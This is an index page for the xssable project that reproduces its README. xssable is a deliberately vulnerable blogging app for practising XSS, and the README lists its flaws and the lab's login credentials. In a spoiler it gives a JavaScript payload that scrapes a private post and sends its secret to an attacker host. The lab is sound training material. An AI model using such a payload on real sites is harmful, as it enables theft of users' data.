Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/kiwicom/xssable
A vulnerable blogging platform used to demonstrate XSS vulnerabilities.
https://github.com/kiwicom/xssable
Last synced: 6 days ago
JSON representation
A vulnerable blogging platform used to demonstrate XSS vulnerabilities.
- Host: GitHub
- URL: https://github.com/kiwicom/xssable
- Owner: kiwicom
- License: mit
- Created: 2019-05-20T11:24:37.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2023-12-15T05:58:25.000Z (11 months ago)
- Last Synced: 2024-08-02T02:02:35.664Z (4 months ago)
- Language: HTML
- Size: 112 KB
- Stars: 9
- Watchers: 9
- Forks: 6
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-vulnerable-apps - xssable - A vulnerable blogging platform used to demonstrate XSS vulnerabilities. (OWASP Top 10 / XSS Injection)
README
## xssable
xssable is a vulnerable blogging platform used to demonstrate XSS vulnerabilities.
### Usage
To run it locally:
```
docker build . -t xssable:latest
docker run -p 5000:5000 xssable:latest
```or
```bash
pip install -r requirements.txt
python app.py
```Then access the application on http://127.0.0.1:5000.
Spoiler!
Credentials for the built-in user accounts are `John:12345` and `Connie:iloveyou1`.
Currently there are 4 different XSS vulnerabilities:
- a reflected XSS (with the possibility to bypass Chrome's XSS Auditor),
- a stored XSS with limited exploitation,
- a stored XSS without limitations, and
- a `location.hash` to `.innerHTML` based DOM XSS.Exploitation (beyond alert() pop-ups) can be practiced by getting access to Connie's private blog post and stealing the secret code.
Spoiler!
```js
fetch('/blogs').then(r => r.text()).then(t => fetch('https://attacker.kiwi.com/?s='%2bt.split('%F0%9F%94%92')[1].split('')[1].split('<')[0]))
```
The application highlights that:
- blacklists are bypass-able,
- browser protections are unreliable,
- not every "XSS" has the same impact,
- frameworks do unexpected stuff, and
- server-side validation is important.##### What's next?
- https://xss-game.appspot.com/ - good for basics, created by Google.
- https://knock.xss.moe - focused on exploitation and filter evasion.
- https://polyglot.innerht.ml/ - an awesome polyglot challenge (it's over by now and the results are public).